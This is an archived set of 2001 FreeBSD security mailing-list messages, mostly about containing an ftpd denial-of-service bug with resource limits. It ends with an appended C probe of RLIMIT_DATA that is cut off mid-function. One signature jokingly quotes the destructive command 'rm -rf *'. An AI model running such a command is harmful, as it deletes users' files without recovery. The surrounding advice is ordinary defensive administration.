	by hub.freebsd.org (Postfix) with SMTP id C21B337B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 10:29:20 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 8199 invoked by uid 1000); 16 Mar 2001 18:28:37 -0000
Date: Fri, 16 Mar 2001 20:28:37 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Anil Jangity <aj@entic.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316202837.C428@ringworld.oblivion.bg>
Mail-Followup-To: Anil Jangity <aj@entic.net>,
	freebsd-security@freebsd.org
References: <20010315215913.A70990@mollari.cthul.hu> <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>; from aj@entic.net on Fri, Mar 16, 2001 at 08:39:07AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 08:39:07AM -0800, Anil Jangity wrote:
> Kris/All,
> 
> FTPD is run as root (at least on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ballpark figure for
> root would be...
> 
> I looked in ftpd(8) for some way to make it run as another user (at least
> after it starts up) but no luck.
> 
> So, my question is, how do you propose we resource limit ftpd as you
> suggest via login.conf?

It might not be easy to do this via login.conf; if you are running your
ftpd via inetd, though, you can use /usr/bin/limits to do that:

ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l

..or you could make an ftpd wrapper:

#!/bin/sh
ulimit -d 10240
exec /usr/libexec/ftpd -l

Having said that, I, too, haven't tested whether setting resource limits
eliminates the original problem.

G'luck,
Peter

-- 
The rest of this sentence is written in Thailand, on

> @ I'm pretty sure (but haven't tested) that resource limits will prevent
> @ this problem.  Your ftpd shouldn't be using large amount of memory
> @ under normal operating procedures, so you can set those to reasonable
> @ values and not suffer any ill effects.
> @
> @ Kris



From owner-freebsd-security  Fri Mar 16 10:33:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id 5EC0237B71A
	for <security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:33:21 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 8263 invoked by uid 1000); 16 Mar 2001 18:32:38 -0000
Date: Fri, 16 Mar 2001 20:32:38 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: James Snow <snow@teardrop.org>
Cc: Kris Kennaway <kris@obsecurity.org>,
	Brooks Davis <brooks@one-eyed-alien.net>, Alex Popa <razor@ldc.ro>,
	security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010316203238.A8245@ringworld.oblivion.bg>
Mail-Followup-To: James Snow <snow@teardrop.org>,
	Kris Kennaway <kris@obsecurity.org>,
	Brooks Davis <brooks@one-eyed-alien.net>, Alex Popa <razor@ldc.ro>,
	security@FreeBSD.ORG
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316125532.A65814@teardrop.org>; from snow@teardrop.org on Fri, Mar 16, 2001 at 12:55:32PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 12:55:32PM -0500, James Snow wrote:
> 
> The problematic code is in src/crypto/openssh/auth2.c in 
> input_userauth_request:

I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
committed a similar fix earlier today :)

G'luck,
Peter

-- 
When you are not looking at it, this sentence is in Spanish.



From owner-freebsd-security  Fri Mar 16 10:34:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
	by hub.freebsd.org (Postfix) with ESMTP id 3D08E37B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:34:39 -0800 (PST)
	(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-213-168-73-160.netcologne.de [213.168.73.160])
	by mr200.netcologne.de (Mirapoint)
	with ESMTP id ACP70358;
	Fri, 16 Mar 2001 19:34:36 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
	by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GIYMY15665;
	Fri, 16 Mar 2001 19:34:22 +0100 (CET)
	(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 19:34:22 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Anil Jangity <aj@entic.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
Message-ID: <Pine.BSF.4.33.0103161922120.9463-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 16 Mar 2001, Anil Jangity wrote:

> FTPD is run as root (at least on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...

The resources are set for the user who logged in through ftp.  ftpd
(root) does a seteuid() to the user and then sets the resource limits.
So, unless you login as root over ftp, you just set limits on the
user.

Too bad a setusercontext() call couldn't be easily implemented inside
of set[e]uid() (it's in -lutil not -lc).  I see too many FreeBSD
admins that believe that their proftpds and qmails are protected by
the limits set in /etc/login.conf.

-Paul.




From owner-freebsd-security  Fri Mar 16 10:35:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id 30D7137B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 10:35:38 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 8327 invoked by uid 1000); 16 Mar 2001 18:34:55 -0000
Date: Fri, 16 Mar 2001 20:34:55 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Anil Jangity <aj@entic.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316203455.B8245@ringworld.oblivion.bg>
Mail-Followup-To: Anil Jangity <aj@entic.net>,
	freebsd-security@freebsd.org
References: <20010315215913.A70990@mollari.cthul.hu> <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net> <20010316202837.C428@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:28:37PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 08:28:37PM +0200, Peter Pentchev wrote:
[snip]
> ..or you could make an ftpd wrapper:
> 
> #!/bin/sh
> ulimit -d 10240
> exec /usr/libexec/ftpd -l

This could even do something like:

exec /usr/libexec/ftpd $*

so it passes to ftpd the arguments it got from inetd, not the hardcoded -l.

G'luck,
Peter

-- 
Do you think anybody has ever had *precisely this thought* before?



From owner-freebsd-security  Fri Mar 16 10:39:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
	by hub.freebsd.org (Postfix) with ESMTP id A156A37B71C
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:39:18 -0800 (PST)
	(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-195-14-244-155.netcologne.de [195.14.244.155])
	by mr200.netcologne.de (Mirapoint)
	with ESMTP id ACP70804;
	Fri, 16 Mar 2001 19:39:16 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
	by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GId8N18527;
	Fri, 16 Mar 2001 19:39:08 +0100 (CET)
	(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 19:39:08 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: Peter Pentchev <roam@orbitel.bg>
Cc: Anil Jangity <aj@entic.net>, <freebsd-security@FreeBSD.ORG>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>
Message-ID: <Pine.BSF.4.33.0103161935410.9463-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi Peter,

On Fri, 16 Mar 2001, Peter Pentchev wrote:

> It might not be easy to do this via login.conf; if you are running your
> ftpd via inetd, though, you can use /usr/bin/limits to do that:
>
> ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l

  ftp stream tcp nowait root/login.class /usr/libexec/ftpd ftpd -l

(where login.class is in /etc/login.conf) will also do the trick.

> Having said that, I, too, haven't tested whether setting resource
> limits eliminates the original problem.

It seems to when the CPU is limited, but as shown in a previous
mail, apparently not when the memory is.  Hmmm...

-Paul.




From owner-freebsd-security  Fri Mar 16 10:40:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
	by hub.freebsd.org (Postfix) with ESMTP id 0510F37B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:40:06 -0800 (PST)
	(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
	by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA61437;
	Fri, 16 Mar 2001 13:40:01 -0500 (EST)
	(envelope-from wollman)
Date: Fri, 16 Mar 2001 13:40:01 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103161840.NAA61437@khavrinen.lcs.mit.edu>
To: Peter Pentchev <roam@orbitel.bg>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316203455.B8245@ringworld.oblivion.bg>
References: <20010315215913.A70990@mollari.cthul.hu>
	<Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
	<20010316202837.C428@ringworld.oblivion.bg>
	<20010316203455.B8245@ringworld.oblivion.bg>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

<<On Fri, 16 Mar 2001 20:34:55 +0200, Peter Pentchev <roam@orbitel.bg> said:

> This could even do something like:

> exec /usr/libexec/ftpd $*

Make that:

exec /usr/libexec/ftpd ${1+"$@"}

(Unlikely to be necessary in the case of ftpd, but that's the correct
way in general.)

-GAWollman




From owner-freebsd-security  Fri Mar 16 10:43:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lunatic.oneinsane.net (lunatic.oneinsane.net [66.42.61.27])
	by hub.freebsd.org (Postfix) with ESMTP id 11DAF37B71C
	for <freeBSD-security@freeBSD.org>; Fri, 16 Mar 2001 10:43:04 -0800 (PST)
	(envelope-from insane@lunatic.oneinsane.net)
Received: by lunatic.oneinsane.net (Postfix, from userid 1000)
	id 3EFB81555B; Fri, 16 Mar 2001 07:15:12 -0800 (PST)
Date: Fri, 16 Mar 2001 07:15:12 -0800
From: Ron 'The InSaNe One' Rosson <insane@lunatic.oneinsane.net>
To: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316071511.A46313@lunatic.oneinsane.net>
Reply-To: Ron Rosson <insane@lunatic.oneinsane.net>
Mail-Followup-To: freeBSD-security@freeBSD.org
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800
X-Operating-System: FreeBSD lunatic.oneinsane.net 4.2-STABLE
X-Moon: The Moon is Waning Gibbous (53% of Full)
X-Opinion: What you read here is my IMHO
X-WWW: http://www.oneinsane.net
X-GPG-FINGERPRINT: 3F11 DB43 F080 C037 96F0  F8D3 5BD2 652B 171C 86DB
X-Uptime: 7:13AM  up 4 days, 11:04, 1 user, load averages: 0.04, 0.05, 0.01
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway (kris@obsecurity.org) wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > >          ---Mike
> > >
> > 
> > So is 4.3-beta (otherwise known as 4-stable) from March 8.  ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes.  This was an ftp connection with a regular username and
> > password, in an average home directory.
> 
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem.  Your ftpd shouldn't be using large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.
> 
> Kris

But, by default are the resource limits set properly to avoid this out
of the box? Or does one have to make the mod themselves?

TIA

-- 
------------------------------------------------------------------------------
Ron Rosson          			      ... and a UNIX user said ...
The InSaNe One                 			      rm -rf *
insane@oneinsane.net     	            and all was /dev/null and *void()
------------------------------------------------------------------------------
daemon(n): 1. an attendant power or spirit : GENIUS
           2. the cute little mascot of the FreeBSD operating system



From owner-freebsd-security  Fri Mar 16 10:50:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204])
	by hub.freebsd.org (Postfix) with ESMTP id 6506337B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 10:50:20 -0800 (PST)
	(envelope-from mudman@R181204.resnet.ucsb.edu)
Received: from localhost (mudman@localhost)
	by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f2GIt4B16753;
	Fri, 16 Mar 2001 10:55:04 -0800 (PST)
	(envelope-from mudman@R181204.resnet.ucsb.edu)
Date: Fri, 16 Mar 2001 10:55:04 -0800 (PST)
From: mudman <mudman@R181204.resnet.ucsb.edu>
To: Per Christian Henden <perchrh@stud.math.ntnu.no>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: weird error messages (at least I don't understand them)
In-Reply-To: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
Message-ID: <Pine.BSF.4.30.0103161052420.16747-100000@R181204.resnet.ucsb.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> arp: unknown hardware address format (0x0800)

Umm, I think someone is just trying to send you a malformed packet in
hopes of knocking your machine down.

Not really something to worry about, I think, if FreeBSD is tossing it out
as it does above.






From owner-freebsd-security  Fri Mar 16 12:23:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
	by hub.freebsd.org (Postfix) with ESMTP id C153037B71A
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 12:23:26 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 530D266B25; Fri, 16 Mar 2001 12:23:26 -0800 (PST)
Date: Fri, 16 Mar 2001 12:23:26 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Shoichi Sakane <sakane@ydc.co.jp>, kris@obsecurity.org,
	freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316122326.A98524@mollari.cthul.hu>
References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp> <20010316144417.A22302@ringworld.oblivion.bg>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316144417.A22302@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 02:44:17PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--HcAYCG3uE/tztfnV
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Fri, Mar 16, 2001 at 02:44:17PM +0200, Peter Pentchev wrote:
> On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > > What I really need to know is what vulnerabilities exist on each box -
> > > > so that I can present the boss with a risk assessment, and make him
> > > > decide if the box stays as is, or gets a make world.
> > 
> > > Read the advisories.
> > 
> > why doesn't the maintainer of the openssh port upgrade its version?
> > current version of the port is openssh 2.2.0 which has some vulnerability.
> 
> The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0
> 'port revision' 2.  The 'port revision' was bumped twice to indicate
> important security fixes.  The 'some vulnerability' you are referring to
> is probably the Bleichenbacher attack, which affected nearly all SSH
> servers at the time; a fix was promptly added to the FreeBSD port.

The above is correct, as is noted in the relevant FreeBSD advisory on OpenSSH :-)

Kris

--HcAYCG3uE/tztfnV
Content-Type: application/pgp-signature
Content-Disposition: inline


--HcAYCG3uE/tztfnV--



From owner-freebsd-security  Fri Mar 16 12:43:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
	by hub.freebsd.org (Postfix) with ESMTP id EDF3937B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 12:43:54 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 9F13F66B25; Fri, 16 Mar 2001 12:43:54 -0800 (PST)
Date: Fri, 16 Mar 2001 12:43:54 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Ashley Penney <ashp@unloved.org>
Cc: freebsd-security@freebsd.org
Subject: Re: What's vunerable?
Message-ID: <20010316124354.A98989@mollari.cthul.hu>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> <20010316121158.A17693@daphne.unloved.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="wac7ysb48OaltWcw"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316121158.A17693@daphne.unloved.org>; from ashp@unloved.org on Fri, Mar 16, 2001 at 12:11:58PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--wac7ysb48OaltWcw
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Fri, Mar 16, 2001 at 12:11:58PM +0100, Ashley Penney wrote:

> One suggestion I would have is to pop to www.nessus.org, and use the
> scanner they provide.  It can output reports in HTML and so forth, with
> pretty graphics for PHB's.  However, it can sometimes trigger false
> alarms so I'd run it against the boxes, and check the results by hand.
>=20
> [I've found this very useful when I suddenly get thrown into 500 boxes,
> all running different versions of OS's.]

Always be careful trusting the results of automated scanners, because
they can never contain a database of ALL known vulnerabilities, so
your system may have other problems than what's noted there.  It may
be useful as a backup to make sure you haven't missed anything,
though.

Kris

--wac7ysb48OaltWcw
Content-Type: application/pgp-signature
Content-Disposition: inline


--wac7ysb48OaltWcw--



From owner-freebsd-security  Fri Mar 16 12:48:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
	by hub.freebsd.org (Postfix) with ESMTP id 268BD37B71A
	for <freeBSD-security@freeBSD.org>; Fri, 16 Mar 2001 12:48:12 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 7A22C66B25; Fri, 16 Mar 2001 12:48:08 -0800 (PST)
Date: Fri, 16 Mar 2001 12:48:08 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Ron 'The InSaNe One' Rosson <insane@lunatic.oneinsane.net>
Cc: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316124808.B98989@mollari.cthul.hu>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu> <20010316071511.A46313@lunatic.oneinsane.net>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="Fba/0zbH8Xs+Fj9o"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316071511.A46313@lunatic.oneinsane.net>; from insane@lunatic.oneinsane.net on Fri, Mar 16, 2001 at 07:15:12AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--Fba/0zbH8Xs+Fj9o
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Fri, Mar 16, 2001 at 07:15:12AM -0800, Ron 'The InSaNe One' Rosson wrote:
> Kris Kennaway (kris@obsecurity.org) wrote:
> > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > > 4.1 from Aug 10th is hurt by it.
> > > >
> > > >          ---Mike
> > > >
> > >=20
> > > So is 4.3-beta (otherwise known as 4-stable) from March 8.  ftpd uses=
 100%
> > > cpu and memory use grows until the kernel runs out of swap space and =
starts
> > > killing processes.  This was an ftp connection with a regular usernam=
e and
> > > password, in an average home directory.
> >=20
> > I'm pretty sure (but haven't tested) that resource limits will prevent
> > this problem.  Your ftpd shouldn't be using large amount of memory
> > under normal operating procedures, so you can set those to reasonable
> > values and not suffer any ill effects.
> >=20
> > Kris
>=20
> But, by default are the resource limits set properly to avoid this out
> of the box? Or does one have to make the mod themselves.

You have to tune resource limits as appropriate for your local
operating environment.

Kris

--Fba/0zbH8Xs+Fj9o
Content-Type: application/pgp-signature
Content-Disposition: inline


--Fba/0zbH8Xs+Fj9o--



From owner-freebsd-security  Fri Mar 16 13: 2:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109])
	by hub.freebsd.org (Postfix) with ESMTP id C8F8C37B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 13:02:40 -0800 (PST)
	(envelope-from pherman@frenchfries.net)
Received: from husten.security.at12.de (dial-213-168-72-106.netcologne.de [213.168.72.106])
	by mr200.netcologne.de (Mirapoint)
	with ESMTP id ACP85460;
	Fri, 16 Mar 2001 22:02:38 +0100 (CET)
Received: from localhost (localhost.security.at12.de [127.0.0.1])
	by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GL2RB49212;
	Fri, 16 Mar 2001 22:02:27 +0100 (CET)
	(envelope-from pherman@frenchfries.net)
Date: Fri, 16 Mar 2001 22:02:27 +0100 (CET)
From: Paul Herman <pherman@frenchfries.net>
To: "ho-sang, yoon" <tsoi@xocah.holywar.net>
Cc: <freebsd-security@FreeBSD.ORG>,
	Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>
Message-ID: <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 16 Mar 2001, ho-sang, yoon wrote:

> $ whoami
> ftp
> $ ulimit -a
> [...]
> data seg size           (kbytes, -d)  524288
> stack size              (kbytes, -s)  65536
> core file size      (512-blocks, -c)  102400
> max memory size         (kbytes, -m)  20480
> locked memory           (kbytes, -l)  10240
> [...]
>
> ---top-----------------------------------------------------------------------
>   PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
>  6379 root      55   0 33360K 33016K RUN      0:40 86.02% 84.67% ftpd
> [cut]
> -----------------------------------------------------------------------------
>
> I don't think that the resource limit has an effect on this matter.
> Or am I wrong about something?

I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
kicked in, but it didn't.  However, what does work is setting the
"datasize"  (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
RLIMIT_DATA.

Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
I'm perusing through sys/vm now...

-Paul.




From owner-freebsd-security  Fri Mar 16 13:17:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67])
	by hub.freebsd.org (Postfix) with ESMTP id 37F1637B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 13:17:35 -0800 (PST)
	(envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost)
	by earth.backplane.com (8.11.2/8.9.3) id f2GLGm674347;
	Fri, 16 Mar 2001 13:16:48 -0800 (PST)
	(envelope-from dillon)
Date: Fri, 16 Mar 2001 13:16:48 -0800 (PST)
From: Matt Dillon <dillon@earth.backplane.com>
Message-Id: <200103162116.f2GLGm674347@earth.backplane.com>
To: Paul Herman <pherman@frenchfries.net>
Cc: "ho-sang, yoon" <tsoi@xocah.holywar.net>,
	<freebsd-security@FreeBSD.ORG>, Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
References:  <Pine.BSF.4.33.0103162158140.10083-100000@husten.security.at12.de>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:>
:> I don't think that the resource limit has an effect on this matter.
:> Or am I wrong about something?
:
:I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
:kicked in, but it didn't.  However, what does work is setting the
:"datasize"  (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
:RLIMIT_DATA.
:
:Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
:I'm perusing through sys/vm now...
:
:-Paul.

    The 'datasize' limit (RLIMIT_DATA) only applies to malloc().  It does
    not apply to mmap().  This is a known issue.  In any case, it would depend
    on what ftpd uses.  I would expect ftpd to use malloc() for internal
    structures and perhaps mmap() (or sendfile()) when reading a file.

    The 'memoryuse' limit (RLIMIT_RSS) only applies to the process's
    in-core size.  If the process exceeds this value and the machine is 
    loaded down, the kernel will attempt to swap pages out to get the
    process back within the limit.  If the machine is mostly idle, the
    kernel ignores this limit.

    Currently we have no resource limit for mmap() use.

						-Matt


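An added probe, written for this archive page and not code from the thread or from FreeBSD (the function and PROBE_* names are my own): it lowers RLIMIT_DATA the way ulimit -d, limits(1) -d and the login.conf "datasize" do, then tries to grow the process through the two paths Matt contrasts, brk/sbrk and anonymous mmap(), and reports which one the kernel refuses; given a command it instead applies the limit and execs it, a C counterpart of the sh wrapper earlier in the thread. On the kernels of this thread only the sbrk path should be refused, but Linux 4.7 and later also charge private writable mappings to RLIMIT_DATA, so the mmap outcome is reported rather than assumed.

```c
#define _GNU_SOURCE          /* sbrk() and MAP_ANONYMOUS on glibc */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON          /* BSD spelling */
#endif

/* Bits returned by probe_allocation_paths(): which path hit ENOMEM. */
#define PROBE_SBRK_REFUSED 1u
#define PROBE_MMAP_REFUSED 2u

/*
 * Lower the soft RLIMIT_DATA to `kbytes` KB, never above the hard limit.
 * This is the same knob as "ulimit -d", limits(1) -d and the login.conf
 * "datasize" capability.  The previous limit is stored in *saved if given.
 * Returns 0 on success, -1 on failure.
 */
int apply_data_limit(rlim_t kbytes, struct rlimit *saved)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_DATA, &rl) != 0)
        return -1;
    if (saved != NULL)
        *saved = rl;
    rlim_t want = (kbytes > RLIM_INFINITY / 1024) ? RLIM_INFINITY : kbytes * 1024;
    if (rl.rlim_max != RLIM_INFINITY && want > rl.rlim_max)
        want = rl.rlim_max;          /* an unprivileged process cannot exceed it */
    rl.rlim_cur = want;
    return setrlimit(RLIMIT_DATA, &rl);
}

/*
 * Try to grow the process by `bytes` through the two paths Matt contrasts:
 * brk/sbrk (what a classic malloc() uses) and an anonymous private mmap().
 * Each growth that succeeds is undone again.  Returns a PROBE_* bitmask.
 */
unsigned probe_allocation_paths(size_t bytes)
{
    unsigned refused = 0;

    void *heap = sbrk((intptr_t)bytes);
    if (heap == (void *)-1)
        refused |= PROBE_SBRK_REFUSED;          /* kernel said ENOMEM */
    else
        sbrk(-(intptr_t)bytes);

    void *map = mmap(NULL, bytes, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        refused |= PROBE_MMAP_REFUSED;
    else
        munmap(map, bytes);

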